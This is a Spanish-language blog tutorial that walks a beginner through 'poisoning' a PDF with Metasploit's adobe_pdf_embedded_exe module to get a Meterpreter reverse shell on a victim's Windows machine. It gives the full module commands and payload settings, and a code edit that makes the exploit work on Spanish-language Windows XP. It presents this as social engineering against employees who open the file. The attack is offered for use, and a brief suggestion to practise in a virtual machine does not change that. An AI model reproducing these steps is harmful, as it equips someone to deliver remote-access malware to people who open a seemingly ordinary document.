Envenenamiento de PDF (Infectando PDF) - Obtención de shell inversa

Hoy les acerco un tutorial bastante interesante para los novatos (como su humilde servidor). Se trata de un step by step (paso a paso) sobre como envenenar un PDF para obtener una shell inversa en nuestro sistema víctima.

Para lograrlo, utilizaremos cualquier distro con metasploit instalado

Aqui vamos...

Para encontrar unas de las amenazas mas frecuentes en una empresa, debemos pensar en las vulnerabilidades a las que se pueden enfrentar los empleados, si el software de nuestra empresa no esta correctamente actualizado, general mente las empresas solo actualizan los parches de seguridad de los sistemas operativos y no tienen, encuenta que el sistema operativo tienen mucho mas software que necesita ser actualizado, con sus respectivas actualizaciones de seguridad. hoy les mostrare como con un poco de ingeniería social podremos obtener una shell reversa o un vnc. utilizando como herramienta nuestro querido Metasploit, utilizando el exploit “adobe_pdf_empedded_exe” con lo cual envenenaremos un pdf tan comun en las empresas como en nuestros hogares anteriormente era mucho mas seguro el pdf que un archivo de word pero hoy en dia es todo lo contrario lo mas inseguro que existe es pdf.

Lo bueno de el modulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en cualquier PDF existente, algo útil es buscar un pdf en google

Otra aspecto a tener en cuenta, es que este modulo tiene rank de Execellent, por lo que es excelente opción, ante los demás exploits client side attacks que son menos estables.

Después de tener un pdf lo que debemos realizar  es abrir metasploit  y haremos lo siguiente:

use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/nuestropdf.pdf
set FILENAME nuevonombre.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST nuestraip
exploit
en la primera opción INFILENAME colocamos la ruta de nuestro pdf a utilizar, y en la opciòn FILENAME colocamos  el nombre al pdf resultante, en LHOST colocamos nuestra IP


luego dejamos escuchando  por la conexiòn reversa que se va a  generar una vez que la victima abra el pdf:


Luego cuando la víctima  abra el PDF, le aparecerá lo siguiente:



Bujuajajajajajaja (risa malvada) XD

Bueno, al momento de presionar “OPEN” el payload serà dropeado en el sistema, y un script  intentara abrirlo. como el exploit esta realizado  para windows xp SP3 English (Ingles),  lo que haremos entonces es modificar el warning que el payload es buscado dentro de “Desktop” (Escritorio),”My Documents” (Mis documentos) .

Para que funcione  con xp en español, debemos modificar el código  del mòdulo, los directorios ” Escritorio” y “Mis Documentos”, y realizamos de nuevo todo el procedimiento sobre el pdf:

esta es la ruta en backtrack

/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

y modificamos  las siguiente linea.
dirs = [ "Desktop", "My Documents", "Documents" ]

por
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]


Si se ejecutará el playload, obtendremos  un Meterpreter


y como podemos ver obtenemos una shell inversa con Meterpreter!

Todo hermoso, muy lindo, pero más de uno se preguntara...¿Y que es una shell inversa? ¿Para que me sirve? Paciencia amigo, segui leyendo...

Basicamente una shell inversa es lograr que, tras ejecutar un "soft" (por llamarlo de algún modo) en la pc remota, esta intente conectarse con nosotros otorgandonos el tan preciado teroso...una shell.

De este modo, podrás manejar o controla la pc como si estuviera delante tuyo, teniendo en tus manos el PODER de alcanzar cualqueir archivo, documento, etc

Todo muy didáctico y hermoso hermano...pero no se que es una shell

Bueno...viendo que no estás con muchas ganas de acudir a Google, voy a hacerlo por vos

Según Wiki...una shell es:
 ...es el término usado en informática para referirse a un intérprete de comandos, el cual consiste en la interfaz de usuario tradicional de los sistemas operativos basados en Unix y similares como GNU/Linux.

Mediante las instrucciones que aporta el intérprete, el usuario puede comunicarse con el núcleo y por extensión, ejecutar dichas órdenes, así como herramientas que le permiten controlar el funcionamiento de la computadora.Más info en: http://es.wikipedia.org/wiki/Shell_de_UNIX

Ya estas poniendo cara de malvado...tranquilo...hacé tus practicas en una maquina virtual. Si no sabés como instalar una...buscá en el foro, hay muchos tutoriales.

Envenenamiento de PDF (Infectando PDF) - Obtención de shell inversa Envenenamiento de PDF (Infectando PDF) - Obtención de shell inversa Reviewed by Zion3R on 14:18 Rating: 5